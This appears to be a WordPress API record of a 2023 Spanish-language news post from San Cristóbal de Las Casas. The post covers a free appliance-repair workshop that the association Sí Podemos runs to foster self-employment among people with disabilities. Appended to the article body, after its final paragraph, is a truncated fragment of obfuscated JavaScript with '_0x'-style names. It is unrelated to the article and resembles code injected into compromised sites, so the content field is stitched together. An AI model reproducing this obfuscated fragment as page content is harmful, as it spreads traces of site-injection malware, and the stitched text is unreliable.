{"id":11736,"date":"2023-09-09T03:37:51","date_gmt":"2023-09-09T03:37:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11736"},"modified":"2023-09-09T03:37:51","modified_gmt":"2023-09-09T03:37:51","slug":"buscan-fomentar-el-auto-empleo-entre-personas-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11736","title":{"rendered":"Buscan fomentar el auto empleo entre personas con discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"747\" height=\"615\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230908-WA0387.jpg\" alt=\"\" class=\"wp-image-11737\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230908-WA0387.jpg 747w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/IMG-20230908-WA0387-300x247.jpg 300w\" sizes=\"auto, (max-width: 747px) 100vw, 747px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. Homer Sevilla Flores, presidente de la Asociaci\u00f3n Civil S\u00ed Podemos, dio a conocer que se encuentran promoviendo el auto empleo entre las personas con discapacidad, a trav\u00e9s de diferentes capacitaciones, por lo que del 18 al 22 de septiembre se estar\u00e1 llevando un taller de reparaci\u00f3n de electrodom\u00e9sticos, dirigido a este sector de l poblaci\u00f3n, lo cual es producto de la colaboraci\u00f3n que tienen con La Albarrada, y el Ministerio de Econom\u00eda de Alemania.&#8221;Nos est\u00e1n dando est\u00e1 posibilidad, para que dos espacios de compa\u00f1eros puedan capacitarse en la reparaci\u00f3n de electrodom\u00e9sticos, cafeteras, planchas, licuadoras, esto para promover la inclusi\u00f3n laboral y el auto empleo porque a veces es muy dif\u00edcil encontrar un trabajo con alguna discapacidad, esperamos pr\u00f3ximamente tener m\u00e1s capacitaciones&#8221;.Aclar\u00f3 que los capacitadores son de la Albarrada, ya que ah\u00ed tienen varios talleres, &#8220;en este caso a trav\u00e9s del Ministerio de Econom\u00eda de Alemania, va otorgar el material, nosotros estamos buscando, es una invitaci\u00f3n abierta para quienes puedan mover las manos que tengan una visi\u00f3n buena y que pueda usar este material del 18 al 22 es completamente gratis&#8221;.&#8221;La gente sigue viendo a las personas por la discapacidad, son pocas las personas e instituciones e incluso asociaciones que tienen est\u00e1 lectura, lo que tenemos que hacer es irnos capacitando para auto emplearse o en el caso de lo que hemos logrado con algunas tiendas transnacionales, d\u00f3nde hay personas con discapacidad trabajando&#8221;, agreg\u00f3.Por \u00faltimo, dijo que se encuentran creando la cultura de la preparaci\u00f3n para la vida independiente, &#8220;a trav\u00e9s de las sillas, de muchas cosas, ahora estamos profesionalizando nuestra estructura para poder bajar recursos internacionales, empresariales o de diferentes programas para la capacitaci\u00f3n integral para las personas con discapacidad y la reinserci\u00f3n laboral, porque de nada nos sirve tener rampas si la persona no puede llegar a trabajar, estamos cuidando que tengan apoyos y crear una red econ\u00f3mica, los interesados se pueden comunicar al 967 115 25 67&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas-. Homer Sevilla Flores, presidente de la Asociaci\u00f3n Civil S\u00ed Podemos, dio a conocer que se encuentran promoviendo el auto empleo entre las personas con discapacidad, a trav\u00e9s de diferentes capacitaciones, por lo que del 18 al 22 de septiembre se estar\u00e1 llevando un taller de reparaci\u00f3n de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11737,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11736","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11736"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11736\/revisions"}],"predecessor-version":[{"id":11738,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11736\/revisions\/11738"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11737"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}